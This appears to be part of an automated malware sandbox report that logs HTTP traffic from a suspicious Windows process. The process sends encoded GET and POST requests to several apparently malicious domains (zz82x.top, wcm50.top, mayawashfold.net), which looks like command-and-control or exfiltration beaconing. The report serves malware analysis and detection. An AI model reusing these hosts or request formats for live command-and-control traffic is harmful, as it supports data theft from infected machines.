                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 72 4b 41 55 35 31 50 6c 4b 74 6c 6f 35 31 70 64 46 30 6c 7a 4a 57 69 64 65 37 51 61 68 48 63 56 6e 7a 4b 6c 36 63 32 72 4f 6a 38 32 62 66 67 4b 79 61 77 42 52 65 42 2b 61 45 4e 48 71 4c 65 6b 31 51 6f 30 51 30 63 67 68 71 4e 4c 64 65 38 4b 70 32 4e 6e 47 68 71 45 51 4e 44 5a 51 4a 6f 79 5a 6a 4c 49 74 63 4b 58 74 53 44 43 76 78 52 41 64 63 34 64 4e 2f 33 63 72 64 4b 6a 39 47 6a 66 6a 74 62 43 66 4c 6d 70 38 49 44 37 54 70 79 46 54 77 34 75 34 72 70 67 48 72 44 41 66 6d 51 31 46 72 6f 48 59 52 54 39 67 79 68 75 45 39 6e 4e 46 73 53 59 6b 71 73 63 55 64 51 77 57 51 4f 2b 4e 66 72 4f 30 5a 62 69 34 36 68 69 71 45 7a 55 78 6b 47 57 72 2f 59 38 6d 46 35 38 75 37 30 53 48 61 50 6f 35 56 49 34 55 62 61 36 70 65 6f 47 69 2b 68 6d 38 77 73 52 51 4e 54 2b 46 34 75 2f 72 34 76 4a 42 63 6a 4c 37 7a 41 74 35 79 38 31 4d 2f 67 55 74 79 70 4b 74 6a 73 6f 73 70 75 47 67 6b 68 70 6d 73 35 4c 56 6c 78 74 71 66 4d 50 79 47 6f 44 30 4a 53 38 72 30 63 46 62 52 30 4b 51 4f 56 35 67 50 52 68 73 [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=rKAU51PlKtlo51pdF0lzJWide7QahHcVnzKl6c2rOj82bfgKyawBReB+aENHqLek1Qo0Q0cghqNLde8Kp2NnGhqEQNDZQJoyZjLItcKXtSDCvxRAdc4dN/3crdKj9GjfjtbCfLmp8ID7TpyFTw4u4rpgHrDAfmQ1FroHYRT9gyhuE9nNFsSYkqscUdQwWQO+NfrO0Zbi46hiqEzUxkGWr/Y8mF58u70SHaPo5VI4Uba6peoGi+hm8wsRQNT+F4u/r4vJBcjL7zAt5y81M/gUtypKtjsospuGgkhpms5LVlxtqfMPyGoD0JS8r0cFbR0KQOV5gPRhsfUI/757TKVbMe4/AcnS5p6lzBRqLtk1K6l8/MGO4yrqwFsBAtmkir90Na8mrep3cLNOlom8fT9I4ryY3Gtn1GW7pTbuZq7x6y7RWCDIkrrJwrmjspe1U8jL8MN0BcdNfB4l9F68/1XhDgqU4djMrvqWX5GCjrw+ugklaVFG1+ZvV9DKLMBMzotvDL56cekKk6Popf+jNDO+qiwu4bjv2YlS26vPY/UjyP3RHUo9+rsAbj1nlIc3bn+F84bE+dTdqCK9VoSRJZM1Bkc1fVsX9tkITRGwOhXxy+xqUauu+iPzjwaBP4xyeBFAIeUJhp1Us9g/xTPs1rsldd8VixjC6AB30ZYsInUWQB+8MQ2Ed+evwCcdJbykNIViXVCg5kq1Wt/PgFGzzs4KYYuyXwCWYhUQKPBuXRM+wiwRRhqa4WCaXPcE7tgW3P44wGOb8p68ZHChz9iRZgOn2/WgzkUnmmdgZSwDM9JGeydA5kIOosRcpFLpDG++3o+DMSSBYOhirTzNu+2VnFUNCPYZ4Mc3IOTaBQZNZ4Kit6WMLGfAyoT6hS+uMkP8WjdY3eWDZtpQDv/tlUpqi+TtqW8C/O7gj8YFaU+qArWVT/ngTWYioZBmJGYp0SCDtIFd9UXwoFl0/qg2MWiL+Bhc7X6y1DJi/7Z0jBM43RMaiph [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.8497193.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:23.130845070 CEST362OUTGET /mtee/?7FhphPx8=mIo06BHEAes+1ktUHg9aZX/pKZMQjyZWlUKS3fumHCh/F9Apz5MmN8cCaSJUq7K+1FNCT10frPNoaLR8s0NWGBCBd7fYdbgwZQXT0szxpSzoohttWdsUK9P7gt6l1VyO9A==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:23.607688904 CEST413INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:44:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 46 68 70 68 50 78 38 3d 6d 49 6f 30 36 42 48 45 41 65 73 2b 31 6b 74 55 48 67 39 61 5a 58 2f 70 4b 5a 4d 51 6a 79 5a 57 6c 55 4b 53 33 66 75 6d 48 43 68 2f 46 39 41 70 7a 35 4d 6d 4e 38 63 43 61 53 4a 55 71 37 4b 2b 31 46 4e 43 54 31 30 66 72 50 4e 6f 61 4c 52 38 73 30 4e 57 47 42 43 42 64 37 66 59 64 62 67 77 5a 51 58 54 30 73 7a 78 70 53 7a 6f 6f 68 74 74 57 64 73 55 4b 39 50 37 67 74 36 6c 31 56 79 4f 39 41 3d 3d 26 64 44 3d 33 58 79 48 36 70 6a 78 47 4c 68 50 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7FhphPx8=mIo06BHEAes+1ktUHg9aZX/pKZMQjyZWlUKS3fumHCh/F9Apz5MmN8cCaSJUq7K+1FNCT10frPNoaLR8s0NWGBCBd7fYdbgwZQXT0szxpSzoohttWdsUK9P7gt6l1VyO9A==&dD=3XyH6pjxGLhPK"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.84972138.47.232.196803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:29.566473961 CEST601OUTPOST /ym8o/ HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.zz82x.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.zz82x.top/ym8o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 35 71 70 4f 75 41 7a 33 66 34 47 4b 4f 52 78 34 36 68 53 76 6e 4a 6c 35 56 63 51 6f 6a 39 52 2f 52 48 71 45 34 53 62 65 64 43 50 4e 6a 54 63 69 2b 77 72 5a 38 2f 52 63 6c 72 78 37 30 57 2f 30 55 64 52 50 52 52 32 55 42 6a 62 57 7a 5a 6e 73 72 6b 44 30 49 45 4b 35 45 47 70 6d 6f 64 65 6a 30 57 6e 74 50 34 56 59 73 62 42 75 6e 44 77 53 59 39 76 38 52 4b 72 4c 53 78 4a 47 47 58 4b 7a 4d 76 69 58 50 6d 36 44 4a 49 42 31 76 68 62 75 71 68 67 45 61 32 56 71 43 31 63 66 61 52 44 69 65 44 43 69 72 43 6e 74 34 77 58 66 62 4e 77 4a 59 44 54 63 78 58 2b 31 33 6d 62 6b 47 72 6a 45 7a 75 52 71 39 51 30 3d
                                                    Data Ascii: 7FhphPx8=5qpOuAz3f4GKORx46hSvnJl5VcQoj9R/RHqE4SbedCPNjTci+wrZ8/Rclrx70W/0UdRPRR2UBjbWzZnsrkD0IEK5EGpmodej0WntP4VYsbBunDwSY9v8RKrLSxJGGXKzMviXPm6DJIB1vhbuqhgEa2VqC1cfaRDieDCirCnt4wXfbNwJYDTcxX+13mbkGrjEzuRq9Q0=
                                                    Sep 11, 2024 15:44:30.511773109 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.84972238.47.232.196803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:32.114779949 CEST621OUTPOST /ym8o/ HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.zz82x.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.zz82x.top/ym8o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 35 71 70 4f 75 41 7a 33 66 34 47 4b 50 79 5a 34 35 42 75 76 68 70 6c 36 66 38 51 6f 36 74 52 37 52 48 6d 45 34 54 65 5a 63 33 58 4e 6a 79 73 69 2f 78 72 5a 79 66 52 63 74 4c 78 36 36 32 2f 42 55 64 63 34 52 55 4f 55 42 6a 66 57 7a 63 62 73 72 31 44 33 4a 55 4b 37 4f 57 70 67 33 4e 65 6a 30 57 6e 74 50 34 42 2b 73 62 5a 75 6d 7a 73 53 62 63 76 37 63 71 72 4b 62 52 4a 47 43 58 4b 2f 4d 76 69 78 50 69 36 6c 4a 4f 46 31 76 6b 6e 75 71 79 34 46 55 47 56 73 66 46 64 30 4b 42 53 62 59 77 65 73 32 7a 4b 4b 77 67 44 4b 54 62 64 6a 43 68 62 61 79 58 57 65 33 6c 7a 53 44 63 2b 73 70 4e 42 61 6a 48 68 55 66 34 6d 75 53 62 41 6a 6c 31 4b 75 4f 43 6a 6a 4b 4b 70 48
                                                    Data Ascii: 7FhphPx8=5qpOuAz3f4GKPyZ45Buvhpl6f8Qo6tR7RHmE4TeZc3XNjysi/xrZyfRctLx662/BUdc4RUOUBjfWzcbsr1D3JUK7OWpg3Nej0WntP4B+sbZumzsSbcv7cqrKbRJGCXK/MvixPi6lJOF1vknuqy4FUGVsfFd0KBSbYwes2zKKwgDKTbdjChbayXWe3lzSDc+spNBajHhUf4muSbAjl1KuOCjjKKpH
                                                    Sep 11, 2024 15:44:33.005851984 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.84972338.47.232.196803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:34.661335945 CEST1638OUTPOST /ym8o/ HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.zz82x.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.zz82x.top/ym8o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 35 71 70 4f 75 41 7a 33 66 34 47 4b 50 79 5a 34 35 42 75 76 68 70 6c 36 66 38 51 6f 36 74 52 37 52 48 6d 45 34 54 65 5a 63 30 33 4e 6a 41 55 69 2b 53 44 5a 7a 66 52 63 6e 72 78 42 36 32 2f 59 55 64 45 30 52 56 79 69 42 68 33 57 31 4f 6a 73 38 52 33 33 51 45 4b 37 47 32 70 6c 6f 64 65 54 30 57 58 78 50 34 52 2b 73 62 5a 75 6d 78 59 53 4d 64 76 37 61 71 72 4c 53 78 4a 4b 47 58 4b 54 4d 73 53 50 50 69 75 54 49 2b 6c 31 76 46 58 75 74 42 63 46 53 57 56 75 63 46 64 73 4b 42 65 36 59 77 43 47 32 7a 50 74 77 69 6a 4b 51 50 41 2f 54 56 61 48 67 57 53 31 77 48 54 59 50 2b 36 56 6b 73 51 75 6c 77 31 6f 63 4f 69 7a 58 59 6b 73 73 48 53 6e 53 6b 62 45 62 66 45 33 67 53 6f 6f 2f 34 41 31 31 49 30 55 6d 61 49 6e 66 52 56 6e 57 51 37 62 7a 2f 50 46 4f 2f 64 6d 55 2b 4e 42 44 2b 38 33 55 72 74 6d 6e 39 43 43 46 4f 54 68 30 6e 35 79 57 67 4b 72 43 67 38 35 4e 56 55 5a 61 4f 76 55 74 64 6d 32 77 68 2b 70 38 79 4f 75 55 72 57 46 30 39 58 53 71 79 49 73 4a 37 6e 6e 2f 71 76 71 33 74 4b 50 66 [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=5qpOuAz3f4GKPyZ45Buvhpl6f8Qo6tR7RHmE4TeZc03NjAUi+SDZzfRcnrxB62/YUdE0RVyiBh3W1Ojs8R33QEK7G2plodeT0WXxP4R+sbZumxYSMdv7aqrLSxJKGXKTMsSPPiuTI+l1vFXutBcFSWVucFdsKBe6YwCG2zPtwijKQPA/TVaHgWS1wHTYP+6VksQulw1ocOizXYkssHSnSkbEbfE3gSoo/4A11I0UmaInfRVnWQ7bz/PFO/dmU+NBD+83Urtmn9CCFOTh0n5yWgKrCg85NVUZaOvUtdm2wh+p8yOuUrWF09XSqyIsJ7nn/qvq3tKPf+ZBVc2EicMu/vaLpDslAePIh6g/1q55iFMMKjipGRXNpKspVlmsSYFWccdOaI8JvARqgJZcouAPjR5NmisJxTIvIcy2f0iFp7J1ZfZAO1L4y+g/5klQNFry9Rjz+ZhAKWX+BaXzwByqMVOD+AUUGjw9tBDc4pScDss7TKAxC1PPIOQHzE/BX3mboDaMuhDp7Ry3WYItHok/7eDVKq4D7FS2dojEZkshAVJ0DE51mLrQ77DAwOKpJJv04fy5PBpZDpqiFeAEH6V6lFFKlgtplUnAzh3VpjSnNeQjq5ioQa/NZlig8dkKO+P52+Ht4wBqbEYQpNZbKinhEpSVF+9E15wg4v8dWZwgF1W5UehiJ6PqA1yPtKNJf/Q3Q7ZBSatvOdTtHSmjIuHRYb2IHPEeEutUT9ZgznWkPb7aTM7A7UD/NILrq8vMgWFi1b2+laCpCIYFaDe98oqQqtZOrrqezH+T/CHeNPr8U+q1awI7YQXKWGGsN0lJpg8iHxMweRCq928lL00f7DOc1F3Aft7FLA3rr3lbIQ1fZV8m9ru+kOFwOBcMR4UbYMSp92Gdn1ay+n8FrC3fhAhnhmwQqh3w1a9ZUjHRsOaHnoMCuYjD4fj2AJdKCXtSP1KgPHQ8f91tP4wFtaCd7dxjUf3BE1M/rndJ4wf8NBRhYPY [TRUNCATED]
                                                    Sep 11, 2024 15:44:35.554090977 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:35 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.84972438.47.232.196803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:37.204586029 CEST355OUTGET /ym8o/?7FhphPx8=0oBut1yNYbWGPCBm9TSA9IgiRO1fme9nbBTx5iLcdFvMwA802wT54clasuFI7VrQYq05SkWGMRfigce42UbKA1ftCWwM+Miq0U3WQ7VDlbB/qS47COTgeoabRThRJ1vWYw==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:38.120410919 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.849725154.23.184.60803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:43.574311018 CEST601OUTPOST /sok0/ HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.wcm50.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.wcm50.top/sok0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 77 6c 69 61 35 72 72 71 6f 77 6e 39 41 33 4e 38 4b 35 65 79 61 76 67 35 72 4d 46 46 36 78 41 4b 6a 4e 64 5a 6b 4d 4b 41 66 49 4e 41 68 48 4f 32 69 7a 42 73 78 4a 2f 48 48 79 6a 72 57 5a 76 42 79 6a 38 7a 5a 35 75 48 74 48 36 6b 4b 75 32 51 74 6f 6d 6a 43 51 6f 57 66 66 79 59 49 31 32 6f 74 7a 6b 52 45 51 71 52 68 48 43 67 4f 6e 32 79 62 61 33 41 4c 48 41 4c 44 39 6d 54 4b 33 67 41 76 76 4d 56 47 58 67 49 64 66 4e 54 37 44 2b 4b 39 37 57 6a 39 55 62 44 4a 4a 48 66 5a 4e 79 48 6f 34 57 79 34 42 51 50 36 48 43 57 6f 4e 45 6c 70 71 58 61 52 44 30 31 69 72 35 4b 36 32 37 73 65 4a 6d 49 79 57 41 3d
                                                    Data Ascii: 7FhphPx8=wlia5rrqown9A3N8K5eyavg5rMFF6xAKjNdZkMKAfINAhHO2izBsxJ/HHyjrWZvByj8zZ5uHtH6kKu2QtomjCQoWffyYI12otzkREQqRhHCgOn2yba3ALHALD9mTK3gAvvMVGXgIdfNT7D+K97Wj9UbDJJHfZNyHo4Wy4BQP6HCWoNElpqXaRD01ir5K627seJmIyWA=
                                                    Sep 11, 2024 15:44:44.463618040 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:44 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.849726154.23.184.60803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:46.114449978 CEST621OUTPOST /sok0/ HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.wcm50.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.wcm50.top/sok0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 77 6c 69 61 35 72 72 71 6f 77 6e 39 47 6d 39 38 4d 61 32 79 50 66 67 34 6e 73 46 46 31 52 41 4f 6a 4e 5a 5a 6b 4a 79 75 66 37 70 41 68 6d 2b 32 6a 78 70 73 77 4a 2f 48 50 53 6a 69 56 70 76 4b 79 6a 77 37 5a 38 75 48 74 45 47 6b 4b 73 2b 51 75 62 4f 73 45 51 6f 55 47 50 79 61 47 56 32 6f 74 7a 6b 52 45 52 61 37 68 44 6d 67 4a 58 6d 79 61 34 66 48 46 6e 41 49 54 74 6d 54 62 6e 67 45 76 76 4e 41 47 53 41 6d 64 63 31 54 37 44 4f 4b 39 75 36 6b 30 55 62 42 47 70 47 62 5a 50 36 4f 6c 5a 61 63 36 53 55 72 39 6e 4f 4e 70 37 70 50 7a 49 66 63 53 44 63 65 69 6f 52 38 2f 42 6d 45 45 71 32 34 73 42 55 72 50 51 38 62 71 53 37 58 37 56 6a 61 6f 43 4b 76 41 5a 4d 63
                                                    Data Ascii: 7FhphPx8=wlia5rrqown9Gm98Ma2yPfg4nsFF1RAOjNZZkJyuf7pAhm+2jxpswJ/HPSjiVpvKyjw7Z8uHtEGkKs+QubOsEQoUGPyaGV2otzkRERa7hDmgJXmya4fHFnAITtmTbngEvvNAGSAmdc1T7DOK9u6k0UbBGpGbZP6OlZac6SUr9nONp7pPzIfcSDceioR8/BmEEq24sBUrPQ8bqS7X7VjaoCKvAZMc
                                                    Sep 11, 2024 15:44:47.025702000 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.849727154.23.184.60803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:48.660743952 CEST1638OUTPOST /sok0/ HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.wcm50.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.wcm50.top/sok0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
